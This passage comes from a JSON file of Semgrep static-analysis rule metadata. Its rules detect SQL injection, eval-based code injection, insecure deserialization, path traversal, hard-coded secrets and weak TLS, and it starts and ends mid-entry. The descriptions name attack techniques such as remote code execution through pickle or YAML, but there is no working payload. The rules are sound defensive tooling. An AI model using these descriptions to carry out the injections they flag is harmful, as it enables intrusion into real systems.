[https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator](https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator)\n","text":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.alloc-strlen.alloc-strlen","id":"cpp.lang.security.strings.alloc-strlen.alloc-strlen","name":"cpp.lang.security.strings.alloc-strlen.alloc-strlen","properties":{"precision":"very-high","tags":["CWE-131: Incorrect Calculation of Buffer Size","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.alloc-strlen.alloc-strlen"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`."},"helpUri":"https://semgrep.dev/r/python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","id":"python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","name":"python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request)\n - [https://openjdk.java.net/groups/net/httpclient/intro.html](https://openjdk.java.net/groups/net/httpclient/intro.html)\n","text":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","id":"problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","name":"problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","id":"python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","name":"python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.xpath.tainted-xpath.tainted-xpath)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"helpUri":"https://semgrep.dev/r/java.micronaut.xpath.tainted-xpath.tainted-xpath","id":"java.micronaut.xpath.tainted-xpath.tainted-xpath","name":"java.micronaut.xpath.tainted-xpath.tainted-xpath","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.xpath.tainted-xpath.tainted-xpath"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure"},"help":{"markdown":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.losformatter?view=netframework-4.8](https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.losformatter?view=netframework-4.8)\n","text":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","id":"csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","name":"csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","id":"python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","name":"python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"help":{"markdown":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli)\n - [https://www.npmjs.com/package/mysql2](https://www.npmjs.com/package/mysql2)\n - [https://www.npmjs.com/package/mysql](https://www.npmjs.com/package/mysql)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n","text":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","id":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","name":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unencrypted request over HTTP detected."},"help":{"markdown":"Unencrypted request over HTTP detected.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.security.react-insecure-request.react-insecure-request)\n - [https://www.npmjs.com/package/axios](https://www.npmjs.com/package/axios)\n","text":"Unencrypted request over HTTP detected."},"helpUri":"https://semgrep.dev/r/typescript.react.security.react-insecure-request.react-insecure-request","id":"typescript.react.security.react-insecure-request.react-insecure-request","name":"typescript.react.security.react-insecure-request.react-insecure-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.security.react-insecure-request.react-insecure-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","id":"terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","name":"terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-open.dangerous-open)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-open.dangerous-open","id":"ruby.lang.security.dangerous-open.dangerous-open","name":"ruby.lang.security.dangerous-open.dangerous-open","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-open.dangerous-open"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-pyyaml.tainted-pyyaml)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","id":"python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","name":"python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-pyyaml.tainted-pyyaml"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","id":"python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","name":"python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks."},"help":{"markdown":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","id":"java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","name":"java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\""},"help":{"markdown":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\"\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls)\n - [https://node-postgres.com/features/ssl](https://node-postgres.com/features/ssl)\n - [https://nodejs.org/api/tls.html#tls_class_tls_tlssocket](https://nodejs.org/api/tls.html#tls_class_tls_tlssocket)\n - [https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options](https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options)\n - [https://nodejs.org/api/tls.html#tls_tls_default_min_version](https://nodejs.org/api/tls.html#tls_tls_default_min_version)\n","text":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\""},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","id":"javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","name":"javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source."},"help":{"markdown":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/)\n","text":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","id":"terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","name":"terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","properties":{"precision":"very-high","tags":["CWE-778: Insufficient Logging","HIGH CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","id":"python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","name":"python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","id":"javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","name":"javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See 